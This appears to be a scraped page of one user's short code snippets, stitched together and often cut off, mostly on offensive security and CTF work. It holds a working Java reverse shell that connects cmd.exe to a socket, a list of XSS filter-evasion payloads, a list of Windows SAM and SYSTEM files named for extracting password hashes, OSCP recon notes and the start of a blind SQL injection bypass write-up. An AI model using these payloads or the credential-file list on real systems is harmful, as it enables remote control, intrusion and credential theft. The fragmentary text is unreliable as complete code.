abdilahrf

#Newbie programmer
def factorial(x):
    if x == 0:
        return 1
    else:
        return x * factorial(x - 1)
print factorial(6)


#First year programmer, studied Pascal

abdilahrf

%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini	This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM	Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system	This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM 
%SYSTEMROOT%\System32\config\RegBack\SAM	These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system

abdilahrf

from __future__ import division
import hashlib
import requests
from datetime import datetime, timedelta

api_url = 'http://rfile.2017.teamrois.cn/api/download/{}/{}'

def totimestamp(dt, epoch=datetime(1970,1,1)):
    td = dt - epoch
    return (td.microseconds + (td.seconds + td.days * 86400) * 10**6) / 10**6

abdilahrf

# coding: utf-8

"""
Unfortunately solved 20 minutes after the end of the CTF :(
"""

import re
import sys
import string
import requests

abdilahrf

<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>        
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>

abdilahrf

Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.

Discussion on reddit.

Python 2.x

$ python -m SimpleHTTPServer 8000

abdilahrf

How to pass the OSCP

1. Recon
2. Find vuln
3. Exploit
4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

abdilahrf

import socket
import time
from twisted.internet.protocol import Factory, Protocol
from twisted.internet import reactor
from twisted.names import dns
from twisted.names import client, server
from twisted.internet import defer

class MyResolver(client.Resolver):
    def lookupAllRecords(self, name, timeout=None):

abdilahrf

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

abdilahrf

There are several ways to bypass blind SQLi filters, and today I will introduce MySQL blind sqli payload using an insert() function.

Interestingly, the payload itself is limited to MySQL, but the technical side of this attack should be still valid in most SQL.

This attack is useful when typical substring filters (i.e. left(), right(), mid(), substr(), regexp(), strcmp(), concat() ... LIKE ... ) are blocked by the script.

TL;DR